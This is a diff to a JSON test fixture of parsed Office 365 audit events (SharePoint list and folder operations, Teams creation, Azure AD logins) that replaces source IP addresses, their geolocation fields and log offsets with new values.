+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1320,7 +1298,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 18289,
+        "log.offset": 18273,
         "o365.audit.CreationTime": "2021-02-05T09:08:00",
         "o365.audit.Id": "9b9e973b-64c3-4607-bc79-bf743c985051",
         "o365.audit.Operation": "TeamCreated",
@@ -1363,7 +1341,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 18695,
+        "log.offset": 18679,
         "o365.audit.AADGroupId": "61b6d6f5-7aa0-437b-a967-fbcd39ec90a1",
         "o365.audit.CommunicationType": "Team",
         "o365.audit.CreationTime": "2021-02-05T09:07:58",
@@ -1408,8 +1386,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:13.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -1424,11 +1402,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 19362,
+        "log.offset": 19346,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd",
         "o365.audit.CreationTime": "2021-02-05T09:08:13",
         "o365.audit.DoNotDistributeEvent": true,
@@ -1458,20 +1436,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -1485,8 +1461,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:12.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FolderCreated",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -1504,11 +1480,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 20481,
+        "log.offset": 20463,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5",
         "o365.audit.CreationTime": "2021-02-05T09:08:12",
         "o365.audit.EventSource": "SharePoint",
@@ -1533,20 +1509,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -1578,7 +1552,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 21523,
+        "log.offset": 21503,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:57",
         "o365.audit.EventData": "<Group>Site Members</Group>",
@@ -1630,7 +1604,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 22335,
+        "log.offset": 22315,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -1682,7 +1656,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 23127,
+        "log.offset": 23107,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -1734,7 +1708,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 23920,
+        "log.offset": 23900,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Members</Group>",
@@ -1786,7 +1760,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 24715,
+        "log.offset": 24695,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -1824,8 +1798,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:07:56.000Z",
-        "client.address": "20.190.143.50",
-        "client.ip": "20.190.143.50",
+        "client.address": "81.2.69.193",
+        "client.ip": "81.2.69.193",
         "event.action": "SiteCollectionCreated",
         "event.category": "web",
         "event.code": "SharePoint",
@@ -1840,11 +1814,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 25507,
+        "log.offset": 25487,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Graph",
         "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000",
-        "o365.audit.ClientIP": "20.190.143.50",
+        "o365.audit.ClientIP": "81.2.69.193",
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<SiteCreationSource>O365AdminCenter</SiteCreationSource><TenantSettings.ShowCreateSiteCommand>True</TenantSettings.ShowCreateSiteCommand><TenantSettings.UseCustomSiteCreationForm>False</TenantSettings.UseCustomSiteCreationForm>",
@@ -1863,20 +1837,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "20.190.143.50",
+        "related.ip": "81.2.69.193",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "20.190.143.50",
+        "source.ip": "81.2.69.193",
         "tags": [
             "forwarded"
         ],
@@ -1904,7 +1876,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 26436,
+        "log.offset": 26414,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -1956,7 +1928,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 27229,
+        "log.offset": 27207,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:55",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -1994,8 +1966,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:14.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "ListUpdated",
         "event.category": "web",
         "event.code": "SharePointListOperation",
@@ -2010,11 +1982,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 28021,
+        "log.offset": 27999,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d",
         "o365.audit.CreationTime": "2021-02-05T09:08:14",
         "o365.audit.DoNotDistributeEvent": true,
@@ -2044,20 +2016,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -2071,8 +2041,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:14.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "ListCreated",
         "event.category": "web",
         "event.code": "SharePointListOperation",
@@ -2087,11 +2057,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 29095,
+        "log.offset": 29071,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d",
         "o365.audit.CreationTime": "2021-02-05T09:08:14",
         "o365.audit.EventSource": "SharePoint",
@@ -2114,20 +2084,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -2141,8 +2109,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -2157,11 +2125,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 30032,
+        "log.offset": 30006,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -2191,20 +2159,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2218,8 +2184,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -2234,11 +2200,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 31123,
+        "log.offset": 31096,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -2268,20 +2234,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2295,8 +2259,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -2311,11 +2275,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 32214,
+        "log.offset": 32186,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -2345,20 +2309,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2372,8 +2334,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -2388,11 +2350,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 33305,
+        "log.offset": 33276,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -2422,20 +2384,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2449,8 +2409,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -2465,11 +2425,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 34396,
+        "log.offset": 34366,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -2499,20 +2459,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2526,8 +2484,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -2542,11 +2500,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 35487,
+        "log.offset": 35456,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -2576,20 +2534,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -2603,8 +2559,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:06:07.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2622,7 +2578,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 36578,
+        "log.offset": 36546,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2635,10 +2591,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
         "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
         "o365.audit.AzureActiveDirectoryEventType": 1,
-        "o365.audit.ClientIP": "79.159.11.115",
+        "o365.audit.ClientIP": "89.160.20.112",
         "o365.audit.CreationTime": "2021-02-05T09:06:07",
         "o365.audit.ErrorNumber": "0",
         "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize",
@@ -2666,20 +2622,20 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "AzureActiveDirectory",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "79.159.11.115",
+        "related.ip": "89.160.20.112",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "79.159.11.115",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "tags": [
             "forwarded"
         ],
@@ -2697,8 +2653,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:06:08.000Z",
-        "client.address": "79.159.11.115",
-        "client.ip": "79.159.11.115",
+        "client.address": "89.160.20.112",
+        "client.ip": "89.160.20.112",
         "event.action": "UserLoggedIn",
         "event.category": "authentication",
         "event.code": "AzureActiveDirectoryStsLogon",
@@ -2716,7 +2672,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 37782,
+        "log.offset": 37750,
         "network.type": "ipv4",
         "o365.audit.Actor": [
             {
@@ -2729,10 +2685,10 @@
             }
         ],
         "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "o365.audit.ActorIpAddress": "79.159.11.115",
+        "o365.audit.ActorIpAddress": "89.160.20.112",
